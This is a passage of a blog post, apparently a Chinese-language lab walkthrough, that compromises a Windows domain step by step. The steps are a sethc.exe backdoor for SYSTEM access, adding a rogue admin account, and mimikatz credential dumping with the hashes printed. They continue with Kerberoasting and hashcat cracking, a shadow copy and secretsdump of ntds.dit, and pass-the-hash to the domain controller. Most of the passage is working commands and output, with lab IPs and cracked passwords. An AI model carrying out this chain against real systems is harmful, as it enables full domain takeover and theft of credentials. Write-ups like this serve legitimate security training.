src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>internal-secret contains a text file with a bunch of account details; find the entry for XR-0923 in it<\/p>\n\n\n\n<figure class=\"wp-block-image 
size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/11-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/11-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>XR-0923 | zhangshuai | wSbEajHzZs<\/code><\/pre>\n\n\n\n<p>After connecting to XR-0923 over RDP I found that this user belongs to the Remote Desktop Users and Remote Management Users groups, so evil-winrm works too. It feels like connecting this way gives somewhat higher privileges? Somehow there are a few extra privileges<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/12-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/12-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre 
class=\"wp-block-code\"><code>proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/13-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/13-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>With SeRestorePrivilege we can modify files or edit the registry regardless of ACLs. Similar to the earlier Magnifier privilege escalation, we can rename cmd.exe to sethc.exe and then press Shift five times on the lock screen to launch sethc and escalate<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ren sethc.exe sethc.bak\nren cmd.exe sethc.exe<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/14-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/14-2.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" style=\"width:840px;height:auto\"\/><\/div><\/figure>\n\n\n\n<p>Pressing Shift five times on the lock screen launches Sticky Keys, and we can see we are already SYSTEM<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/15-1-1024x601.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/15-1-1024x601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>Grab the flag, then add an admin account and log back in<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>type C:\\Users\\Administrator\\flag\\flag03.txt\nnet user fushuling qwer1234! 
\/add\nnet localgroup administrators fushuling \/add<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/16-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/16-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>Annoyingly, after renaming the file I couldn't rename it back; it probably has to be done as the zhangshuai user. It doesn't affect the rest of the attack, though. Dump the passwords (you must use version 2.2, otherwise it errors out)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/17-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/17-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre 
class=\"wp-block-code\"><code>mimikatz # privilege::debug\nPrivilege '20' OK\n\nmimikatz # sekurlsa::logonpasswords\n\n......\nuthentication Id : 0 ; 5911516 (00000000:005a33dc)\nSession           : Interactive from 3\nUser Name         : UMFD-3\nDomain            : Font Driver Host\nLogon Server      : (null)\nLogon Time        : 2023\/10\/10 21:37:36\nSID               : S-1-5-96-0-3\n        msv :\n         &#91;00000003] Primary\n         * Username : XR-0923$\n         * Domain   : XIAORANG\n         * NTLM     : e89745986378835c3e1781da017fcb27\n         * SHA1     : 186e01ef383f305b1c636de1aa63753607ea0826\n        tspkg :\n        wdigest :\n         * Username : XR-0923$\n         * Domain   : XIAORANG\n         * Password : (null)\n        kerberos :\n         * Username : XR-0923$\n         * Domain   : xiaorang.lab\n         * Password : af 8b 8e 71 25 e9 47 3d 60 f2 df 99 21 68 f5 7b 93 54 8c 54 b1 a8 96 0d 37 c3 9f cb 49 c7 b0 89 d1 75 8a 21 ae 39 96 86 09 c5 ef 6e 8a 83 2c 75 e2 d9 31 47 21 64 bf 4a 50 16 cd e1 15 e0 33 4e cd 86 3a 89 13 a5 b5 23 6c 77 bf 8f ac d4 cd 3f 83 60 a5 24 fb dd e0 bd 68 54 28 68 d8 f8 86 eb e1 dc 5c a3 5d 5c a6 6a ae d0 13 fe 3c be 58 b7 86 0e fe 9f c7 90 53 df 8b 09 3d 30 d2 40 71 66 6c 70 00 0f 40 d0 f3 7a 3d b1 43 a2 c4 12 17 c5 dd 29 92 b3 72 c5 02 aa 0c 0a f1 fd f5 47 83 ba 2b 1c e8 65 68 e8 23 56 ce d8 da bc cf c3 eb 71 25 a5 20 54 97 50 de 09 7c a8 3a 77 14 cb 33 a1 af 04 af e4 4b 92 85 82 61 67 75 3f fa bb 42 b4 c4 5f 30 ce 5a 4f 41 70 e4 ec ae 4d 0e f8 8a 51 32 8b d1 2d 03 03 37 06 55 d7 9e 2c 08 17 8c e3\n        ssp :\n        credman :\n        cloudap :\n......<\/code><\/pre>\n\n\n\n<p>\u62ff\u7740 <code>XR-0923$<\/code> \u7684ntlm\u54c8\u5e0c\u770bSPN\u80fd\u627e\u5230\u4e00\u4e2atianjing\u7528\u6237<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains impacket-GetUserSPNs xiaorang.lab\/'XR-0923$' -hashes ':e89745986378835c3e1781da017fcb27' -dc-ip 172.22.14.11<\/code><\/pre>\n\n\n\n<figure 
class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/18-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/18-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u6293\u4e00\u4e0b\u54c8\u5e0c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains impacket-GetUserSPNs xiaorang.lab\/'XR-0923$' -hashes ':e89745986378835c3e1781da017fcb27' -dc-ip 172.22.14.11 -request-user tianjing<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/19-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/19-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>hashcat\u7206\u7834<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat -m 13100 -a 0 1.txt \/usr\/share\/wordlists\/rockyou.txt --force<\/code><\/pre>\n\n\n\n<figure 
class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/20-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/20-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>tianjing:DPQSXSXgh2<\/code><\/pre>\n\n\n\n<p>evil-winrm\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 \nwhoami \/priv<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/21-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/21-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u6709\u5907\u4efd\u4ee5\u53ca\u8fd8\u539f\u6587\u4ef6\u6216\u76ee\u5f55\u7684\u6743\u9650\uff0c\u53ef\u4ee5\u5377\u5f71\u62f7\u8d1d\u7136\u540e\u8bfbsam(SAM\u662f\u5b89\u5168\u8d26\u6237\u7ba1\u7406\u5668\u6570\u636e\u5e93\uff0c\u5305\u542b\u4e86\u672c\u5730\u7528\u6237\u53ca\u7528\u6237\u7ec4,\u5305\u62ec\u5b83\u4eec\u7684\u53e3\u4ee4\u53ca\u5176\u4ed6\u5c5e\u6027\uff0c\u4f4d\u4e8e\u6ce8\u518c\u8868\u7684HKLM<em>\\<\/em>SAM\u4e0b\u9762)<\/p>\n\n\n\n<p>\u672c\u5730\u521b\u4e00\u4e2araj.dsh\uff0c\u5199\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set context persistent nowriters\nadd volume c: alias raj\ncreate\nexpose %raj% z:<\/code><\/pre>\n\n\n\n<p>\u63a5\u7740\u7528unix2dos raj.dsh\u8f6c\u5316\u683c\u5f0f<\/p>\n\n\n\n<p>\u7136\u540e\u5207\u6362\u5230C\u76ee\u5f55\uff0c\u7136\u540e\u521b\u4e00\u4e2atest\u6587\u4ef6\u5939\u5207\u6362\u8fc7\u53bb(\u4e0d\u7136\u540e\u9762\u4f1a\u6ca1\u6743\u9650)\uff0c\u628a\u672c\u5730\u7684raj.dsh\u4e0a\u4f20\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mkdir test\ncd test\nupload raj.dsh<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/22-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"605\" height=\"311\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/22-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2794\"  sizes=\"auto, (max-width: 605px) 100vw, 
605px\" \/><\/div><\/figure>\n\n\n\n<p>\u5377\u5f71\u62f7\u8d1d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>diskshadow \/s raj.dsh<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/23-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"758\" height=\"473\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/23-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2795\"  sizes=\"auto, (max-width: 758px) 100vw, 758px\" \/><\/div><\/figure>\n\n\n\n<p>\u590d\u5236\u5230\u5230\u5f53\u524d\u76ee\u5f55\uff0c\u4e5f\u5c31\u662f\u6211\u4eec\u521b\u5efa\u7684\u8fd9\u4e2atest\u76ee\u5f55<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>RoboCopy \/b z:\\windows\\ntds . 
ntds.dit<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/24.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"753\" height=\"493\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/24.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2796\"  sizes=\"auto, (max-width: 753px) 100vw, 753px\" \/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u628asam\u4e0b\u4e0b\u6765\uff0c\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u6211\u4ee3\u7406\u7684\u95ee\u9898\uff0c\u8d3c\u6162\uff0c\u627e\u4e0d\u5230\u56fe\u4e86\uff0c\u53cd\u6b63\u547d\u4ee4\u5c31\u662fdownload  ntds.dit<\/p>\n\n\n\n<p>\u63a5\u4e0b\u6765\u4e0b\u8f7dsystem<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>reg save HKLM\\SYSTEM system\ndownload system<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/25.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"706\" height=\"101\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/25.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2792\"  sizes=\"auto, (max-width: 706px) 100vw, 706px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/26.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"686\" height=\"311\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/26.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2793\"  sizes=\"auto, (max-width: 686px) 100vw, 686px\" \/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u7528download\u4e0b\u6765\u7684ntds.dit\u548csystem\u672c\u5730\u8fdb\u884c\u89e3\u5bc6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>impacket-secretsdump -ntds ntds.dit -system system local<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/27.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/27.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u62ff\u4e0b\u57df\u63a7<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains evil-winrm -i 172.22.14.11 -u Administrator -H \"70c39b547b7d8adec35ad7c09fb1d277\"<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u8003\u70b9:<br \/>\n\u4fe1\u606f\u6cc4\u9732<br \/>\nJenkins\u521d\u59cb\u7ba1\u7406\u5458\u5bc6\u7801<br \/>\njenkins\u540e\u53f0RCE<br \/>\nGitlab API Token<br \/>\nOracle RCE<br \/>\nSeRestorePrivilege\u63d0\u6743<br \/>\nSPN<br \/>\n\u5377\u5f71\u62f7\u8d1d\u63d0\u53d6SAM<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-2787","post","type-post","status-publish","format-standard","hentry","category-11"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2787","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=2787"}],"version-history":[{"count":13,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2787\/revisions"}],"predecessor-version":[{"id":2875,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2787\/revisions\/2875"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=2787"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.ph
